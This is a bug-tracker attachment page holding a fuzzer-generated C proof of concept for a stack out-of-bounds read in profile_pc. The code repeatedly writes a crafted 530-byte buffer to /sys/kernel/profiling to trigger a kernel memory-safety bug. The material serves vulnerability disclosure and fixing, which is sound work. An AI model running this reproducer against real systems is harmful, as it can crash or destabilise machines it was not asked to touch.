Bugzilla – Attachment 719 Details for
Bug 4845
There is a stack-out-of-bounds read in profile_pc
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
Poc files that can trigger vulnerabilities
poc.c (text/x-csrc), 4.77 KB, created by
DuckRui
on 2023-04-27 15:52:34 UTC
(
hide
)
Description:
Poc files that can trigger vulnerabilities
Filename:
MIME Type:
Creator:
DuckRui
Created:
2023-04-27 15:52:34 UTC
Size:
4.77 KB
patch
obsolete
>// autogenerated by AntFuzz > >#define _GNU_SOURCE > >#include <dirent.h> >#include <endian.h> >#include <errno.h> >#include <fcntl.h> >#include <signal.h> >#include <stdarg.h> >#include <stdbool.h> >#include <stdint.h> >#include <stdio.h> >#include <stdlib.h> >#include <string.h> >#include <sys/prctl.h> >#include <sys/stat.h> >#include <sys/syscall.h> >#include <sys/types.h> >#include <sys/wait.h> >#include <time.h> >#include <unistd.h> > >static void sleep_ms(uint64_t ms) >{ > usleep(ms * 1000); >} > >static uint64_t current_time_ms(void) >{ > struct timespec ts; > if (clock_gettime(CLOCK_MONOTONIC, &ts)) > exit(1); > return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000; >} > >static bool write_file(const char* file, const char* what, ...) >{ > char buf[1024]; > va_list args; > va_start(args, what); > vsnprintf(buf, sizeof(buf), what, args); > va_end(args); > buf[sizeof(buf) - 1] = 0; > int len = strlen(buf); > int fd = open(file, O_WRONLY | O_CLOEXEC); > if (fd == -1) > return false; > if (write(fd, buf, len) != len) { > int err = errno; > close(fd); > errno = err; > return false; > } > close(fd); > return true; >} > >static void kill_and_wait(int pid, int* status) >{ > kill(-pid, SIGKILL); > kill(pid, SIGKILL); > for (int i = 0; i < 100; i++) { > if (waitpid(-1, status, WNOHANG | __WALL) == pid) > return; > usleep(1000); > } > DIR* dir = opendir("/sys/fs/fuse/connections"); > if (dir) { > for (;;) { > struct dirent* ent = readdir(dir); > if (!ent) > break; > if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0) > continue; > char abort[300]; > snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name); > int fd = open(abort, O_WRONLY); > if (fd == -1) { > continue; > } > if (write(fd, abort, 1) < 0) { > } > close(fd); > } > closedir(dir); > } else { > } > while (waitpid(-1, status, __WALL) != pid) { > } >} > >static void setup_test() >{ > prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); > setpgrp(); > write_file("/proc/self/oom_score_adj", "1000"); >} > >static void execute_one(void); > >#define WAIT_FLAGS __WALL > >static void loop(void) >{ > int iter = 0; > for (;; iter++) { > int pid = fork(); > if (pid < 0) > exit(1); > if (pid == 0) { > setup_test(); > execute_one(); > exit(0); > } > int status = 0; > uint64_t start = current_time_ms(); > for (;;) { > if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid) > break; > sleep_ms(1); > if (current_time_ms() - start < 5000) > continue; > kill_and_wait(pid, &status); > break; > } > } >} > >uint64_t r[1] = {0xffffffffffffffff}; > >void execute_one(void) >{ > intptr_t res = 0; >memcpy((void*)0x20000000, "/sys/kernel/profiling", 21); > res = syscall(__NR_openat, 0xffffffffffffff9cul, 0x20000000ul, 0x40201ul, 0ul); > if (res != -1) > r[0] = res; >*(uint32_t*)0x20000300 = 0x230; >*(uint8_t*)0x20000304 = 0x37; >*(uint16_t*)0x20000305 = 0; >*(uint8_t*)0x20000307 = 0; >*(uint64_t*)0x20000308 = 0; >*(uint64_t*)0x20000310 = 0; >*(uint32_t*)0x20000318 = -1; >*(uint16_t*)0x2000031c = 0x212; >memcpy((void*)0x2000031e, "\235\325\337\'\272\'/!\201]#\321\312\245\267\230\377\2128\210\257\267\220\206z\375\361\204\314\342\025\377C2y\347\227-\235\217\275\251N\330\352\364;\266\366\216\344\302\212\364\307\026N!\026\017j\322\177\301\b\246\250\211\343\346-\aq\246\033\',\325\216\277\2512\272\232\030\342\204\311\257\273pI\202o$\372\016\024\217\270A\242\306\243\324\035\262\030\032?\203\006\243\243\202\033\377\235\315\217\256\331\000\242d\341\034\365\b\210<\341\b\037\311\256\346\325k\266*/\031\202\266\361\315\343&\356K\017Yt\272l\016\370\204 \212\240\031\201?\321\3411\334(\361%\246r\030\211\326b\242\206:\265`\247\001m9\334h\026R\257~\256\266l\212[8\366\316mx\230\236\032\346\005\216\004\220\252\264\212;\312\232\252T\357f<{\307\3204\261\215\362\215\302\310c\376\r\354\023)\026\374\023\n\030\202\272G\b\266i\367;\227\322gP\255\354\233l[`\265\177\332J\360\245\362\205E\036\223\245/uvrg\276JHT\347\017\204\365#\376\213(ax)\037\222\207\355\361\364\ah\257\347\356>\0054\'\316\212\377Ir\330=\021l\202<\317\221%I*\313$V\032\314\356\002\213\321\3608\036\032\\vf\345\325\275\337\2250\363)nvI\331S8jXB\272\327\035Vp_\372\306-\003\343\336\231\265\032\236\340\356L\221\377b\'\310\353\351\002\037.\r{\247\305m\321{\276\2007S\003\200V\271\322\253\205\023\262\353\344\r*\034\032\322U\201.6S\241z/0\361\272T0\033h\275GW^\005\252\3022\207Z\335\366f+\274\001N7\361V\363\357\225\367\226\250\202/\233(\203\320cu\276\265W\243x\234K\215A\323\241\327\253\252LW\254\377\021\356&\242\326\006Y\215\t\206\322\312\265\374E\004\031\332\353\240\256`\205l\f\002\351\262\277\2419\206*\374\231\243\367\350\230\027\246\230\326\370\212\005\215q\rV", 530); > syscall(__NR_write, r[0], 0x20000300ul, 0x230ul); > >} >int main(void) >{ > syscall(__NR_mmap, 0x1ffff000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul); > syscall(__NR_mmap, 0x20000000ul, 0x1000000ul, 7ul, 0x32ul, -1, 0ul); > syscall(__NR_mmap, 0x21000000ul, 0x1000ul, 0ul, 0x32ul, -1, 0ul); > loop(); > return 0; >}
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=719">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 4845
:
718
| 719